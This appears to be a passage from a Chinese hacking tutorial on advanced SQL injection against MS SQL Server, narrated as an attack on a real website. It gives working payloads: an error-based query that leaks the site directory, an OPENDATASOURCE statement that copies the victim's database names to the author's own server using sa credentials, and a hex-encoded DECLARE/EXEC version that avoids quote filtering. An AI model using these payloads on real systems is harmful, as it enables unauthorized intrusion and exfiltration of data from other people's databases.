SQL注入高级技巧nowthk篇

直接执行成功，呵呵，反正没有用到单引号，这种方法是现在所能想出来的了，也算一点点小小的突破吧。
把上述语句直接在浏览器里提交，返回正常的页面，然后用and 1=(selet top 1 xy1 from xy)成功暴出了网站的目录为d:\wwwfuck\，哈哈，怀着侥幸的心理直接在此目录下差异备份数据库，失败！结论：1、语句没有错误　2、目录有问题。
于是现在猜一把，就猜网站目录在D盘，那么唯一可行的办法就是一个一个暴目录啊~，郁闷，极其麻烦的事情又要来临了！
我比较懒，随后想到的就是sql里的opendatasource命令,我机器装有sql，IP为211.11.11.11，我想把远程执行sql返回的结果直接插到我自己机器sql所建的表中，所以这样比较轻松，为了证明是否成功，我先建一个表为ku(id nvarchar(255)),然后远程提交的格式为:
insert into opendatasource(’sqloledb’,’server=211.11.11.11;uid=sa;pwd=fuck!!;database=test’).test.dbo.ku select name from master.dbo.sysdatabases

其中test为我自己的库，ku为test库中的表名　如果成功的话，在本地打开ku表，上述语句就会列出远程服务器中所有的库的名称。
上面的语句有单引号，我们直接转换为16进制，转换后用如下语句提交即可:
;DECLARE @S NVARCHAR(4000);SET @S=CAST(0x69006E007300650072007400200069006E0074006F0020006F00700065006E00640061007400610073006F00750072006300650028002700730071006C006F006C0065006400620027002C0027007300650072007600650072003D003200310031002E00310031002E00310031002E00310031003B007500690064003D00730061003B007000770064003D006600750063006B00210021003B00640061007400610062006100730065003D007400650073007400270029002E0074006500730074002E00640062006F002E006B0075002000730065006C0065006300740020006E0061006D0065002000660072006F006D0020006D00610073007400650072002E00640062006F002E00730079007300640061007400610062006100730065007300 AS NVARCHAR(4000));EXEC(@S);